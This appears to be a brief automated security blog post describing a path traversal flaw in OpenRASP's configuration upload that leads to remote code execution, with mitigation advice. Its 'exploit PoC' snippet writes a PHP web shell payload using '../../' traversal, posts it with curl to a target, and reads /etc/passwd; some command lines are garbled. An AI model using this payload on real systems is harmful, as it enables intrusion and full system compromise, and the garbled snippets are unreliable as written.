OpenRASP, Path Traversal & RCE, CVE-2025-62630 (Critical)

Listen to this Post

How the mentioned CVE works:

This vulnerability exists due to insufficient sanitization of user-supplied input in the configuration file upload mechanism of OpenRASP. An attacker can craft a malicious configuration file containing path traversal sequences (e.g., ‘../../’). When this file is processed, the application fails to properly validate the file paths, allowing the attacker to write the file outside the intended restricted directory. By uploading a specially crafted configuration file, the attacker can overwrite critical system files or upload a web shell to a web-accessible directory, ultimately leading to remote code execution with the high privileges of the application, which often runs with system-level permissions.
Platform: OpenRASP
Version: < 2.5.1
Vulnerability: RCE
Severity: Critical
date: 2025-11-06

Prediction: Patch by 2025-12-15

What Undercode Say:

find /opt/openrasp -name ".conf" -exec grep -l "upload" {} \;
curl -X POST -F "[email protected]" http://target.com/upload
cat /etc/passwd
!/bin/bash
Exploit PoC structure
echo "Creating malicious configuration..."
echo '{"path":"../../../../tmp/shell.php","code":"<?php system($_GET[\"cmd\"]); ?>"}' > payload.conf

How Exploit:

  1. Attacker crafts a malicious configuration file with path traversal sequences.
  2. Attacker uploads the file via the vulnerable configuration upload endpoint.

3. The application unsanitizedly processes the file path.

  1. The file is written to an arbitrary filesystem location.
  2. Attacker accesses the written file to execute arbitrary commands.

Protection from this CVE:

Update to OpenRASP version 2.5.1 or later.

Implement strict input validation for file uploads.

Sanitize user input by removing path traversal sequences.

Run the application with least privilege principles.

Restrict upload directories to non-executable locations.

Impact:

Remote Code Execution

Complete System Compromise

Unauthorized Data Access

Privilege Escalation
